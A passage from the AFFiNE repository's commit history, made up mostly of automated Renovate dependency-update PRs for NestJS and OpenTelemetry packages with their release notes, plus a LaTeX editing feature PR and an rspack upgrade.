Commit Graph

1811 Commits

Author SHA1 Message Date
renovate[bot] d9cebdfc95 chore: bump up nestjs (#14968)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.20/11.1.21?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.20/11.1.21?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.20/11.1.21?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.4.2` →
`11.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.2/11.4.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.2/11.4.3?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.20` →
`11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.20/11.1.21)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.21?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.20/11.1.21?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.3`](https://redirect.github.com/nestjs/swagger/compare/11.4.2...0d79a3c9dea89236314609f8b18ec98b12c18692)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.2...11.4.3)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/websockets)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 23:39:14 +08:00
renovate[bot] 97d9ae3183 chore: bump up @opentelemetry/semantic-conventions version to v1.41.1 (#14962)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`1.40.0` →
`1.41.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsemantic-conventions/1.41.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/semantic-conventions)</summary>

###
[`v1.41.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 18:25:55 +08:00
Jachin 542da0b347 feat(editor): improve latex editing support (#14924)
## Summary
- support converting selected text into inline LaTeX equations
- support turning text blocks into LaTeX equation blocks
- add equation entries to editor toolbars while keeping inline equation
with text formatting actions

## Tests
- yarn tsc -b blocksuite/affine/inlines/latex/tsconfig.json
blocksuite/affine/blocks/note/tsconfig.json
blocksuite/affine/blocks/root/tsconfig.json
blocksuite/affine/rich-text/tsconfig.json
blocksuite/affine/widgets/keyboard-toolbar/tsconfig.json --pretty false
- git diff --check origin/canary...HEAD

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Equation block support with conversion from existing blocks.
  * Inline LaTeX insertion added to the inline formatting toolbar.
* Equation action added to the keyboard toolbar; Equation blocks
searchable via math/equation/latex aliases.

* **Improvements**
* Inline LaTeX editor opens and syncs more reliably; selection/convert
flow preserves distinct LaTeX values when converting in reverse order.

* **Tests**
  * New e2e tests for inline LaTeX conversions and value preservation.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14924)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 11:56:54 +08:00
DarkSky 1201f7c350 chore: bump rspack (#14957)
#### PR Dependency Tree


* **PR #14957** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
  * Updated minimum Node version requirement to 22.12.0 or later.
* Updated build tool dependencies including rspack and related packages.
  * Removed CI-specific logging behavior from development server.
* Migrated to native HTML plugin integration for improved build
efficiency.
* Simplified build configuration by removing unused experimental
options.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14957)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-14 04:18:49 +08:00
renovate[bot] 2b22fe4692 chore: bump up nestjs (#13791)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) |
[`13.2.4` →
`13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.2.4/13.4.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.2.4/13.4.0?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.18/11.1.20?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.18/11.1.20?slim=true)
|
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) |
[`13.2.5` →
`13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.2.5/13.4.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.2.5/13.4.0?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.18/11.1.20?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20?slim=true)
|
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) |
[`6.1.1` →
`6.1.3`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.1.1/6.1.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fschedule/6.1.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fschedule/6.1.1/6.1.3?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.2.7` →
`11.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.2.7/11.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.2.7/11.4.2?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.18` →
`11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.18/11.1.20)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.20?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.18/11.1.20?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/graphql (@&#8203;nestjs/apollo)</summary>

###
[`v13.4.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.3.0...v13.4.0)

#### 13.4.0 (2026-04-30)

##### Features

- `apollo`, `graphql`, `mercurius`
- [#&#8203;3811](https://redirect.github.com/nestjs/graphql/pull/3811)
feat(graphql): Add registerIn option for module-scoped type filtering
([@&#8203;joe-re](https://redirect.github.com/joe-re))

##### Bug fixes

- `graphql`
- [#&#8203;3959](https://redirect.github.com/nestjs/graphql/pull/3959)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
stop double-registering PickType inputs
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3960](https://redirect.github.com/nestjs/graphql/pull/3960)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
de-duplicate per-target metadata in TargetMetadataCollection
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- `apollo`, `graphql`
- [#&#8203;3962](https://redirect.github.com/nestjs/graphql/pull/3962)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
restore Timestamp scalar parsers in federation factory
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Enhancements

- `graphql`
- [#&#8203;3963](https://redirect.github.com/nestjs/graphql/pull/3963)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
validate registerEnumType/createUnionType options eagerly
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3954](https://redirect.github.com/nestjs/graphql/pull/3954)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Masato Noguchi ([@&#8203;joe-re](https://redirect.github.com/joe-re))
- Mateus Welter Goettems
([@&#8203;mateuswgoettems](https://redirect.github.com/mateuswgoettems))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.3.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.3.0)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.5...v13.3.0)

#### 13.3.0 (2026-04-22)

##### Bug fixes

- `graphql`
- [#&#8203;3949](https://redirect.github.com/nestjs/graphql/pull/3949)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
count args for parenless arrow functions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3952](https://redirect.github.com/nestjs/graphql/pull/3952)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
keep class directive when a field has the same SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3946](https://redirect.github.com/nestjs/graphql/pull/3946)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit enum key for Args defaultValue in generated SDL
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3934](https://redirect.github.com/nestjs/graphql/pull/3934)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
treat single-key string enums as enums in plugin type detection
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3939](https://redirect.github.com/nestjs/graphql/pull/3939)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
preserve ResolveField options for all overloads
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`
- [#&#8203;3940](https://redirect.github.com/nestjs/graphql/pull/3940)
fix(apollo): preserve HTTP 200 for execution-level GraphQL errors
([@&#8203;maruthang](https://redirect.github.com/maruthang))

##### Enhancements

- `graphql`
- [#&#8203;3838](https://redirect.github.com/nestjs/graphql/pull/3838)
perf(graphql): bypass ExternalContextCreator for scalar ResolveField
fast-path ([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- [#&#8203;3950](https://redirect.github.com/nestjs/graphql/pull/3950)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
forward specifiedByURL and extensions on custom scalars
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3951](https://redirect.github.com/nestjs/graphql/pull/3951)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
accept array of SDL strings in
[@&#8203;Directive](https://redirect.github.com/Directive)
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3944](https://redirect.github.com/nestjs/graphql/pull/3944)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
emit clearer error when nested object type is used in mapped input
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3943](https://redirect.github.com/nestjs/graphql/pull/3943)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add conditional exports for browser shim
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3942](https://redirect.github.com/nestjs/graphql/pull/3942)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
default federation to v2.12 directives
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3936](https://redirect.github.com/nestjs/graphql/pull/3936)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
allow CustomScalar methods to return null
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- `apollo`, `graphql`
- [#&#8203;3948](https://redirect.github.com/nestjs/graphql/pull/3948)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
support directives on enums and unions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
- [#&#8203;3925](https://redirect.github.com/nestjs/graphql/pull/3925)
chore(deps): update dependency ts-morph to v28
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3918](https://redirect.github.com/nestjs/graphql/pull/3918)
fix(deps): update graphql-tools monorepo
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3928](https://redirect.github.com/nestjs/graphql/pull/3928)
chore(deps): update dependency fastify to v5.8.5
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3858](https://redirect.github.com/nestjs/graphql/pull/3858)
chore(deps): update dependency
[@&#8203;mercuriusjs/gateway](https://redirect.github.com/mercuriusjs/gateway)
to v5.2.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3920](https://redirect.github.com/nestjs/graphql/pull/3920)
chore(deps): update dependency mercurius to v16.9.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Ariel Safar
([@&#8203;ArielSafar](https://redirect.github.com/ArielSafar))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

###
[`v13.2.5`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.2.5)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.4...v13.2.5)

##### 13.2.5 (2026-04-09)

##### Bug fixes

- `graphql`
- [#&#8203;3846](https://redirect.github.com/nestjs/graphql/pull/3846)
fix([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
handle definitions factory typename option
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))

##### Enhancements

- `graphql`
- [#&#8203;3889](https://redirect.github.com/nestjs/graphql/pull/3889)
feat([@&#8203;nestjs/graphql](https://redirect.github.com/nestjs/graphql)):
add stopOnApplicationShutdown option for graceful shutdown
([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

##### Dependencies

- `graphql`
- [#&#8203;3894](https://redirect.github.com/nestjs/graphql/pull/3894)
fix(deps): update dependency graphql-ws to v6.0.8
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3852](https://redirect.github.com/nestjs/graphql/pull/3852)
chore(deps): update dependency graphql to v16.13.2
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3888](https://redirect.github.com/nestjs/graphql/pull/3888)
fix(deps): update dependency ws to v8.20.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3901](https://redirect.github.com/nestjs/graphql/pull/3901)
fix(deps): update dependency
[@&#8203;nestjs/mapped-types](https://redirect.github.com/nestjs/mapped-types)
to v2.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3904](https://redirect.github.com/nestjs/graphql/pull/3904)
fix(deps): update dependency lodash to v4.18.1 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `apollo`
- [#&#8203;3902](https://redirect.github.com/nestjs/graphql/pull/3902)
fix(deps): update dependency lodash.omit to v4.18.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3897](https://redirect.github.com/nestjs/graphql/pull/3897)
chore(deps): update dependency
[@&#8203;apollo/server](https://redirect.github.com/apollo/server) to
v5.5.0 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3881](https://redirect.github.com/nestjs/graphql/pull/3881)
chore(deps): update dependency
[@&#8203;apollo/gateway](https://redirect.github.com/apollo/gateway) to
v2.10.5 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
- [#&#8203;3899](https://redirect.github.com/nestjs/graphql/pull/3899)
chore(deps): update dependency
[@&#8203;mercuriusjs/federation](https://redirect.github.com/mercuriusjs/federation)
to v5.1.1
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3890](https://redirect.github.com/nestjs/graphql/pull/3890)
chore(deps): update dependency fastify to v5.8.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))
- [#&#8203;3868](https://redirect.github.com/nestjs/graphql/pull/3868)
chore(deps): update dependency mercurius to v16.8.0
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 2

- Nicolas Guégan
([@&#8203;NicolasGn](https://redirect.github.com/NicolasGn))
- YoonDH ([@&#8203;dgfh0450](https://redirect.github.com/dgfh0450))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

###
[`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
- [#&#8203;16762](https://redirect.github.com/nestjs/nest/pull/16762)
fix(microservices): use backing field for consumer CRASH event listener
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- [#&#8203;16764](https://redirect.github.com/nestjs/nest/pull/16764)
fix(microservices): prevent stack overflow in jsonsocket.handledata()
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon
([@&#8203;burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.20`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.20)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

##### v11.1.20 (2026-05-13)

##### Bug fixes

- `core`, `testing`
- [#&#8203;16939](https://redirect.github.com/nestjs/nest/pull/16939)
fix(core): fix deeply nested transient providers resolution
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `core`
- [#&#8203;16861](https://redirect.github.com/nestjs/nest/pull/16861)
fix(core): fix [@&#8203;Sse](https://redirect.github.com/Sse) losing
events on complete
([@&#8203;MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer))
- [#&#8203;16753](https://redirect.github.com/nestjs/nest/pull/16753)
fix(core): defer sse writehead until after lifecycle completes
([@&#8203;jkalberer](https://redirect.github.com/jkalberer))
- [#&#8203;16782](https://redirect.github.com/nestjs/nest/pull/16782)
